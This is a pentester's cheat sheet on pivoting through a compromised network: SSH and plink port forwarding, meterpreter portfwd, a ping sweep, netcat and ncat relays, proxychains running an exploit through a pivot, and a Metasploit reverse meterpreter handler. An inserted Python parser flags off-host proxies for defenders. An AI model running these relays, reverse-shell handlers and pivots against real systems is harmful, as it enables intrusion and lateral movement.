Pivoting understanding


ssh -L 9001:yahoo.com:80 home -L ::

ssh -L ::

ssh -R 9001:intra-site.com:80 home (Executed from 'work')

plink.exe -l root -pw mysecretpassword -R 3307:

Port forward with metasploit

We can also forward ports using metasploit. Say that the compromised machine is running services that are only accessible from within the network, from within that machine. To access that port we can do this in meterpreter:

portfwd add -l -p -r

portfwd add -l 3306 -p 3306 -r 192.168.222

portfwd add -l 3389 -p 3389 -r

root@host:~# for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done;

$ nc -l -p 80 0<backpipe

ssh -L port:destination_host:destination_port username@pivot_host

ssh -L 80:ip:80 user@ip - local port forwarding

nmap -PN -sT -sV -p 80 localhost

nmap -PN -sV -p 80 --script=http-methods localhost

nikto -host ip -useproxy

burp suite:
destination host: *
proxy host:
proxy port: 80
Authentication type: none

Dynamic port forwarding

SSH dynamic port forwarding is set up on the attacker’s system by entering:

ssh -D -f -N user@ip

The syntax of the command is ssh -D address:port -f -N username@pivot_host

2.8 Using Ncat for Pivoting

ncat --listen --proxy-type http ip 8080

run post/windows/gather/arp_scanner RHOSTS=

use auxiliary/server/socks4a

==================================================================================== ssh portforwarding

ssh -L webmaster@ip

ssh -L webmaster@ip


proxychains portforwarding https://github.com/haad/proxychains

ssh -D webmaster@ip

strict_chain
quiet_mode
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
localnet

[ProxyList]
socks4 8888

proxychains4 -f ~/pivot.conf /usr/bin/python exploit.py ip 10000

proxychains4 -f ~/pivot.conf ncat -v ip 4444
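Added example (not from these notes or the proxychains project): a small parser for the proxychains.conf format shown above, the kind of thing a responder can use to inventory proxychains configs found on a host and flag proxies that point off-box. The sample config is constructed; the extra socks5 entry and the malformed line are there to exercise auth parsing and error handling.

```python
from dataclasses import dataclass, field

# Constructed sample mirroring the proxychains.conf fragment in these notes
SAMPLE_CONF = """\
strict_chain
quiet_mode
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
localnet 127.0.0.0/255.0.0.0
[ProxyList]
socks4 127.0.0.1 8888
socks5 10.0.0.5 1080 user pass   # constructed entry, not from the notes
bogus entry
"""
CHAIN_MODES = {"strict_chain", "dynamic_chain", "random_chain", "round_robin_chain"}
PROXY_TYPES = {"http", "socks4", "socks5", "raw"}

@dataclass
class ProxyChainsConfig:
    chain_mode: str = "strict_chain"  # proxychains' default when no mode line is set
    options: dict = field(default_factory=dict)
    proxies: list = field(default_factory=list)
    errors: list = field(default_factory=list)

def parse_proxychains(text: str) -> ProxyChainsConfig:
    """Parse proxychains(-ng) config text; malformed entries go to cfg.errors."""
    cfg, in_list = ProxyChainsConfig(), False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        if line.lower() == "[proxylist]":
            in_list = True
            continue
        parts = line.split()
        if not in_list:  # global section: a chain mode or "key [value]"
            if parts[0] in CHAIN_MODES:
                cfg.chain_mode = parts[0]
            else:
                cfg.options[parts[0]] = " ".join(parts[1:]) or True
        elif parts[0] in PROXY_TYPES and len(parts) in (3, 5) and parts[2].isdigit():
            cfg.proxies.append({"type": parts[0], "host": parts[1],
                                "port": int(parts[2]), "auth": tuple(parts[3:5]) or None})
        else:
            cfg.errors.append(f"line {lineno}: malformed proxy entry {line!r}")
    return cfg

def offhost_proxies(cfg):
    """Proxies not on loopback: traffic leaves this host through another machine."""
    return [p for p in cfg.proxies if not p["host"].startswith("127.")]
```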


ncat: LDFLAGS="-static" ./configure && make ncat_build (build ncat static binary)

ncat -lv --broker -m2 10000

$ ncat -v 10000 -c "ncat -v 10000"

./exploit.py 10000

ncat -lv --broker -m2 4444

$ ncat -v 4444 -c "ncat -v 4444"

nc -v 4444

============================================================================= metasploit

msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E

msf exploit(handler) > route add ip 1